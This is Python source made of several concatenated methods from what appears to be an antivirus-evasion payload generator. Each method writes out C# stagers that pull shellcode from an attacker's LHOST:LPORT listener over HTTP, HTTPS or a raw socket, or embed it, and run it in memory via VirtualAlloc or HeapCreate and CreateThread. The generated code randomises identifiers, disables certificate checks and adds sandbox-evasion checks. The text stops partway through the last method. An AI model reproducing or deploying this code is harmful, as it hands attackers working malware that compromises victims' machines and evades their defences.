def generate(self): # imports and namespace setup payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( evasion_helpers.randomString(), evasion_helpers.randomString()) # code for the randomString() function randomStringName = evasion_helpers.randomString() bufferName = evasion_helpers.randomString() charsName = evasion_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # logic to turn off certificate validation validateServerCertficateName = evasion_helpers.randomString() payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % ( validateServerCertficateName) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = evasion_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = evasion_helpers.randomString() baseStringName = evasion_helpers.randomString() randCharsName = evasion_helpers.randomString() urlName = evasion_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = evasion_helpers.randomString() strName = evasion_helpers.randomString() webClientName = evasion_helpers.randomString() sName = evasion_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % ( validateServerCertficateName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = evasion_helpers.randomString() sName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything sName = evasion_helpers.randomString() randomName = evasion_helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check curlyCount += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check curlyCount += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check curlyCount += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check curlyCount += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check curlyCount += 1 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);}\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # imports and namespace setup payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( helpers.randomString(), helpers.randomString()) # code for the randomString() function randomStringName = helpers.randomString() bufferName = helpers.randomString() charsName = helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = helpers.randomString() baseStringName = helpers.randomString() randCharsName = helpers.randomString() urlName = helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = helpers.randomString() strName = helpers.randomString() webClientName = helpers.randomString() sName = helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = helpers.randomString() sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything sName = helpers.randomString() randomName = helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" payload_code2, curlyCount = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);}\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get random variables for the API imports r = [helpers.randomString() for x in range(12)] y = [helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" num_tabs_required += 2 if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode) payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, bytearrayName) payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( bytearrayName, funcAddrName, bytearrayName) payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 Encode Shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() shellcodeName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 2 payload_code += '\t' * num_tabs_required + "string %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(\"%s\"));" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + "string[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) payload_code += '\t' * num_tabs_required + "byte[] %s = new byte[chars.Length];\n" % ( shellcodeName) payload_code += '\t' * num_tabs_required + "for (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): getDataName = helpers.randomString() injectName = helpers.randomString() payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n" payload_code += "namespace %s { class %s {\n" % ( helpers.randomString(), helpers.randomString()) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) sName = helpers.randomString() funcAddrName = helpers.randomString() hThreadName = helpers.randomString() threadIdName = helpers.randomString() pinfoName = helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = 